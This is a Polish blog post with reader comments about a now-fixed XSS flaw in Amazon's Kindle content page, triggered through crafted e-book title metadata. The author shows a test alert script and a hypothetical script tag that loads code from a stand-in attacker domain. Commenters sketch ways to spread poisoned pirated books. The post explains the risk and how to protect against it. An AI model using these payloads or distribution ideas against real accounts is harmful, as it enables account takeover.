Za drogo? Ustaw alerty cenowe na e-booki i kupuj taniej!

[Nieaktualne] O tym, że pirackie książki mogą Ci się włamać na konto w Amazonie

Tytuł dzisiejszego wpisu brzmi dość fantastycznie, ale przedstawia realną możliwość. Ryzyko jest małe, żeby nie powiedzieć znikome, choć powinniśmy o nim wiedzieć.

Aktualizacja z 17 września: błąd został już usunięty przez Amazon. Dlatego artykuł ma charakter archiwalny.

O całej sprawie kilka dni temu doniósł na swoim blogu niejaki Benjamin Daniel Mussler.

Chodzi o to, że odpowiednio spreparowane metadane książki (np. tytuł) mogą wykonywać złośliwy kod na stronie Amazonu – jeśli taką książkę wyślemy na swoje konto Kindle (np. mailowo albo przez Send To Kindle) i przejdziemy do listy książek na naszym koncie.

Sprawdziłem, że to niestety działa. Korzystając z Calibre zmieniłem metadane książki w tytule wpisując <script>alert(’test xss’)</script> czyli prosty skrypt otwierający okienko z komunikatem.

Książkę wysłałem na czytnik. Wchodzę na stronę zarządzania kontem Kindle i co widzę:

Skrypt uruchomił się jeszcze przed załadowaniem listy książek. Jest to typ ataku zwany XSS.

Ten akurat skrypt był niegroźny. Ale możemy sobie wyobrazić coś w rodzaju <script src=”https://www.stronahackera.pl/brzydki-skrypt.js”></script> – taki skrypt uruchomiony na stronie Amazonu może wyciągnąć z niej jakieś dane i w skrajnym przypadku pozwolić na przejęcie naszego konta. Sprawa jest więc poważna.

Jest to niesamowite przeoczenie ze strony Amazonu. Mussler pisze, że odkrył je już rok temu – i wysłał raport do firmy, w starej wersji konta Kindle dziura została szybko załatana. Jednak parę miesięcy temu pojawił się nowy wygląd konta i tam ten błąd nadal występuje. Amazon na ponowne zgłoszenie nie zareagował.

Podobny błąd Mussler odkrył w programie Calibre – jednak jego twórca naprawił go w ciągu kilku godzin w wersji 1.80.

Jakie jest ryzyko?

Podsumujmy:

  • Jeśli kupujemy tylko książki z księgarni i ściągamy z zaufanych stron – prawie żadne – to „prawie” zakłada sytuację, że na taką stronę ktoś dokona włamania i zmieni mechanizm wysyłania książek na czytniki.
  • Jeśli konwertujemy książki samodzielnie – żadne, raczej nic na komputer nam się nie włamie, żeby podmienić akurat tytuł.
  • Jeśli nie korzystamy z chmury Kindle i wysyłamy książki po kablu – żadne, nawet jeśli na Kindle trafi książka z podmienionymi danymi.
  • Jeśli ściągamy książki z różnych podejrzanych stron – ryzyko jest.

Jak się zabezpieczyć?

Jeśli mamy książkę nieznanego pochodzenia, wtedy dobrze przed wysłaniem jej w chmurę, otworzyć ją do Calibre – i tam będziemy mogli podejrzeć czy pola „Tytuł” i „Autor” nie zawierają żadnych dziwnych znaków.  Jeśli mają – możemy te dane zmienić i przekonwertować książkę.

Jeśli mamy podejrzenia, że książka z kodem trafiła na nasze konto (bo np. tytuł wygląda dziwnie na czytniku), to pod żadnym pozorem nie wchodzimy na listę książek na naszym koncie. Pamiętajmy – zły kod może się wywołać TYLKO na stronie „Manage Your Content and Devices” w Amazonie i nigdzie indziej.

Książkę możemy podejrzeć i ewentualnie usunąć przez Amazon Cloud Drive – tak jak to opisywałem w artykule. Logujemy się tam hasłem Amazonu i w folderze „My Send-to-Kindle Docs” widzimy wszystkie pliki z konta.

Tutaj skrypt nie działa (bo automat pozamieniał niebezpieczne znaki), możemy więc plik zaznaczyć i usunąć.

Podsumowanie

Treść artykułu jest dość groźna, ale moim zdaniem nie ma powodów do paniki ani do rezygnacji z chmury Amazonu.

Dziura jest i to poważna, może nam zaszkodzić tylko w jednym przypadku – gdy trafimy na odpowiednio spreparowaną książkę. Profilaktyka jest jasna – nie można ufać w pełni plikom ściąganym z różnych dziwnych stron.

Czytaj dalej:

Artykuł był przydatny? Jeśli tak, zobacz 6 sposobów, na jakie możesz wspomóc Świat Czytników. Dziękuję!

Ten wpis został opublikowany w kategorii Korzystanie z Kindle i oznaczony tagami . Dodaj zakładkę do bezpośredniego odnośnika.
Hosting: Zenbox

29 odpowiedzi na „[Nieaktualne] O tym, że pirackie książki mogą Ci się włamać na konto w Amazonie

  1. Ja to bardziej uważam za intrygująca ciekawostkę niż prawdziwe zagrożenie :-)

    0
    • stondrek pisze:

      Problem przestanie być intrygującą ciekawostką, jeżeli wywołany skrypt będzie kupował w Twoim imieniu jakieś „produkty” sprzedawane przez „hackera”, z wykorzystaniem amazonowego „one-click”.

      0
      • Oczywiście.

        Ale prawdopodobieństwo takiego scenariusza jest tak niskie że aż pomijalne. Ten wektor ataku jest po prostu nie praktyczny.

        0
        • stondrek pisze:

          …a ściągnięcie za pomocą takiego skryptu malware’u i instalacja na komputerze… już brzmi groźniej (praktyczniej)?

          0
            • Nie zrozumiałeś mojej wypowiedzi. Nieważne co tym błędem można zrobić hipotetycznie (a można dużo) tylko czy opłaca się go używać do niecnych działań – nie opłaca bo szansa spełnienia warunków infekcji jest niebywale niski.

              0
              • kjonca pisze:

                Szansa, że ktoś się nabierze na phishing też jest niebywale niska.
                Ale jednak niektórzy się nabierają …
                Wystarczy tylko odpowiednio dużo wysłać.

                0
          • tia pisze:

            Nie ma żadnej korelacji miedzy tą luką i sugerowanym przez Ciebie „ściągnięciem i instalacją na komputerze malware’u”. To zupełnie inne sprawy, tak jak zgubienie karty kredytowej nie oznacza, ze ktoś się włamuje do mieszkania…

            0
            • kjonca pisze:

              Oczywiście, że jest. Takie coś może spowodować wczytanie strony, która to strona może spowodować instalację czegoś ciekawego.

              0
              • Holden Caulfield pisze:

                Nie, nie może. Chyba że ktoś klika bezmyślnie „Ok” w każdym okienku jakie mu wyskoczy na ekranie.

                0
    • tia pisze:

      Co więcej, jesli chcesz być „bezpieczny” po prostu przekonwertuj sobie książkę „niewiadomego pochodzenia” za pomocą Calibre (nawet bez zmiany formatu) i po kłopocie.

      0
  2. Dares pisze:

    Hoho niezła luka :) a z drugiej strony dziwie się tak potężnym firmom że jeszcze robią tak podstawowe błędy…

    0
    • Robert Drózd pisze:

      O tym było tutaj nieraz – Amazon ma na tej swojej stronie niesamowity bałagan. Najlepszym dowodem było to, że przez ponad rok sprzedawali do Polski Kindle bez pobierania VAT, którego sami jednak płacili, to na pewno nie było przemyślane działanie. :) Pewnie programiści są gonieni w podobnym tempie co pracownicy magazynów.

      0
  3. Maks pisze:

    Myślę, że ryzyko jest gdy konwertuje się książki samodzielnie. Nie można wykluczyć wirusa, modyfikującego jakieś wtyczki Calibre czy innych programów konwertujących i wtedy mimo, że np. legalnie zakupiony epub, to poprzez konwersję zainfekowanym programem wpuszczamy intruza.

    0
    • RobertP pisze:

      Mało prawdopodobne, zbyt zawiłe. Cały ciąg zależności (wymagana w systemie obecność wirusa, Calibre i korzystanie z konta w Amazonie) to już prościej wrzucić na forum fałszywą wtyczkę dedykowaną do MOBI.

      0
    • Holden Caulfield pisze:

      Jak będziesz miał w systemie wirusa to ingerencja w pliki mobi będzie Twoim ostatnim zmartwieniem.

      0
  4. piterk pisze:

    Książki włamywacze:-). trzeba uważać

    0
  5. Kuba pisze:

    ale w Fakcie o tym nie napisali ;)

    0
  6. SStefania pisze:

    Nikomu już nie można w dzisiejszych czasach ufać :(

    0
  7. Mateusz "Koovert" Wołczyk pisze:

    Hm, aż dziw, że nikt tego jeszcze nie napisał:
    Noscript
    Czyli dodatek do Firefoksa domyślnie wyłączający JavaScript poza dozwolonymi przez nas stronami. O ile <script>alert(‚test xss’)</script> zadziała, bo wykona się ze strony Amazonu, to linkowany na innej domenie http://www.stronahackera.pl/brzydki-skrypt.js będzie już blokowany.
    Jedyny wektor ataku (ech, za dużo czytam Niebezpiecznika…) jaki pozostanie, to upchanie całego złośliwego kodu w tagu, a to może już być bardziej problematyczne, np. może się cały nie zmieścić, Amazon może go przyciąć automatycznie przy dodawaniu, albo nie wyświetlić w pełni.

    0
  8. Kerhold pisze:

    No tak, ale zagrożenie jest chyba również, gdy ktoś zacznie wysyłać odpowiednio spreparowane książki na losowe konta Kindle? Przecież niekoniecznie musimy to robić sami, a i hasła do tego nie potrzeba. Czy się mylę?

    0
    • Mateusz "Koovert" Wołczyk pisze:

      Hasła nie, ale konto na Amazonie przyjmuje tylko książki wysłane z wcześniej określonych adresów e-mailowych.
      Uprzedzając: tak, można wysłać maila z fałszywym odbiorcą, ale tak czy inaczej trzeba tego odbiorcę wcześniej znać, żeby wiedzieć pod kogo się podszyć.

      0
      • kjonca pisze:

        „Uprzedzając: tak, można wysłać maila z fałszywym odbiorcą, ale tak czy inaczej trzeba tego odbiorcę wcześniej znać, żeby wiedzieć pod kogo się podszyć.”

        s/odbior/nadaw/g

        No i akurat to chyba nie jest problem.

        0
        • Mateusz "Koovert" Wołczyk pisze:

          Hm. Nie rozumiem. Możesz napisać jaśniej?
          Chodzi mi o to, że żeby samemu wgrać komuś książkę na serwery Amazonu trzeba znać:
          1) przynajmniej jeden adres mailowy z listy adresów do dostaw skorelowanych z urządzeniami podłączonym do konta,
          2) przynajmniej jeden adres e-mail z listy dopuszczalnych do wysyłania adresów e-mail, pod który trzeba się podszyć.
          Trzeba więc znać dwa adresy (po jednym z każdej listy), żeby wstrzyknąć skrypt. I to nie jest problem?

          0
          • kjonca pisze:

            Czyli trzeba znać adres nadawcy i odbiorcy. Jako adres nadawcy bierzemy adres jakiejś księgarni. Adres odbiorcy generujemy słownikowo. Oczywiście kupa par się nie zgodzi i zostanie odrzucona. Ale trochę trafimy …. widzisz jakiś problem?
            A jak pozyskują adresy spamerzy?

            0
            • Mateusz "Koovert" Wołczyk pisze:

              Biorąc adres księgarni bylibyśmy ograniczeni do jej klientów. Ten zbiór jest ograniczony do tych którzy mają konto na Amazonie, a następnie przez tych, którzy umożliwili księgarni wysyłkę. Nawet biorąc pod uwagę, że jedna osoba może mieć kilka różnych dla poszczególnych urządzeń mamy w porywach kilkanaście? kilkadziesiąt? tysięcy adresów (dane z sufitu).
              I to tej małej grupy chcesz generować losowo skorelowane adresy e-mail? Ile trafisz? Ile z tych osób loguje się na stronę Amazonu? Wydaje mi się, że potencjalny odzew byłby (byłby, bo teraz dyskusja jest czysto akademicka) za mały w porównaniu do zaangażowanych środków.

              0
  9. Piotr pisze:

    Bierzemy jakiś książkowy hicior, najlepiej tuż przed faktyczną premierą e-booka i odpowiednio zmieniamy pole tytułu.
    Plik rozpuszczamy w chomiku, czy gdzie tam gimpiraci pliki trzymają.
    Połowa ściągających pewnie w życiu Calibre nie widziała na oczy. Ściągają, zapisują na dysku i zaraz potem wysyłają sobie na maila kindlowego. Jak zobaczą, że trefna, to niby powinni od razu skasować, no ale wszystkie ataki opierają się na statystyce. Jeżeli można popełnić serię błędów, to odpowiedni odsetek użytkowników na pewno je popełni.

    0
    • Robert Drózd pisze:

      Połowa ściągających to nie wie, że coś takiego jak mail kindle istnieje :) Wydaje mi się, że jednak większość tych mniej świadomych użytkowników Kindle przegrywa po prostu pliki na czytnik.

      0

Skomentuj SStefania Anuluj pisanie odpowiedzi

Twój adres e-mail nie zostanie opublikowany. Wymagane pola są oznaczone *

Przed dodaniem komentarza zapoznaj się proszę z zasadami komentowania i polityką prywatności

Komentarze do tego artykułu można śledzić także w formacie RSS.